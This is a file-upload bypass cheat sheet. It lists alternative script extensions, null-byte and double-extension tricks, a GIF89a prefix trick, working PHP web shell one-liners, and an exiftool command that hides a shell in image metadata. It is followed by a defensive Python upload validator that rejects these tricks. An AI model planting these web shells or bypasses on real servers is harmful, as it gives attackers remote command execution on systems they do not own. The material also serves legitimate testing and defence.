Rename it
Upload it as shell.php.jpg
Blacklisting bypass, change extension
PHP: .phtml, .php, .php3, .php4, .php5, and .inc
A blacklist can be bypassed by uploading a file with a less common PHP extension, such as: pht, phpt, phtml, php3, php4, php5, php6
ASP: .asp, .aspx
Perl: .pl, .pm, .cgi, .lib
JSP: .jsp, .jspx, .jsw, .jsv, and .jspf
ColdFusion: .cfm, .cfml, .cfc, .dbm
Whitelisting bypass
A whitelist can be bypassed by uploading a file with some kind of trick,
such as null byte injection (shell.php%00.gif),
or by using a double extension for the uploaded file (shell.jpg.php).
GIF89a;
If they check the content, you just add the text "GIF89a;" before your shell code.
GIF89a; <? system($_GET['cmd']);//or you can insert your complete shell code ?>
1. <?php system($_GET['cmd']); ?> //shell.php
2. exiftool "-comment<=shell.php" malicious.png
3. strings malicious.png | grep system
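From the defending side, an added example (not from the original page) of a server-side check that rejects the filename tricks listed above and shows why a magic-byte check alone does not stop the GIF89a case. The function and constant names are hypothetical, and it assumes the upload directory never executes files that have an allowlisted image extension.

```python
import os
import re
import secrets

# Allowlist: final extension -> magic-byte prefixes the content must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions from the lists above that a web server may hand to an interpreter.
EXECUTABLE = set(
    "php pht phpt phtml php3 php4 php5 php6 inc asp aspx pl pm cgi lib "
    "jsp jspx jsw jsv jspf cfm cfml cfc dbm".split()
)
# Heuristic only: short tags like "<?" are too short to match reliably in
# binary image data, so the generated storage name below is the real control.
SCRIPT_MARKER = re.compile(rb"<\?php", re.IGNORECASE)


def validate_upload(filename, data):
    """Return (ok, reason, storage_name); storage_name is None on rejection."""
    name = os.path.basename(filename.replace("\\", "/"))
    # Null-byte trick: reject raw and still-encoded NULs, never truncate.
    if "\x00" in name or "%00" in name:
        return False, "null byte in filename", None
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing name or extension", None
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, "extension not allowlisted", None
    # Double extension: shell.php.jpg may still execute where the server maps
    # ".php" anywhere in the name to a handler, so check every segment.
    if any(p in EXECUTABLE for p in parts[1:-1]):
        return False, "executable extension in filename", None
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    # Catches "<?php" placed in image metadata (the exiftool comment case).
    if SCRIPT_MARKER.search(data):
        return False, "script marker in content", None
    # Never store under the client-supplied name.
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"
```

A file that begins with "GIF89a;" followed by a short-tag script still passes the content checks here; it is stored under a random name with a .gif extension, which is what keeps it from being executed.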